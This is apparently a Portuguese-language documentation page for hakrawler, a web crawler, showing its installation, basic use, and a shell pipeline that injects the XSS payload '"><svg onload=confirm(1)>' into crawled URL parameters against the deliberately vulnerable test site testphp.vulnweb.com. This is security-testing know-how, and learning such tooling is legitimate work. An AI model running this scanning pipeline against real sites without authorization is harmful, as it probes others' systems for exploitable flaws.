Pular para o conteúdo principal

hakrawler

Web crawler escrito em Golang para coletar URLs e arquivos JavaScript.

https://github.com/hakluke/hakrawler

Instalação

go install github.com/hakluke/hakrawler@latest
mv ~/go/bin/hakrawler /usr/bin

ou

sudo apt install hakrawler # Kali Linux

Uso básico

echo testphp.vulnweb.com | hakrawler -subs

Procurando XSS

Podemos automatizar a procura de XSS utilizando o hakrawler em conjunto com o airixss:

echo testphp.vulnweb.com | \
    httpx -silent | \
    hakrawler -subs | \
    grep "=" | \
    qsreplace '"><svg onload=confirm(1)>' | \
    airixss -payload "confirm(1)" | \
    egrep -v 'Not'

Instalação
Uso básico
Procurando XSS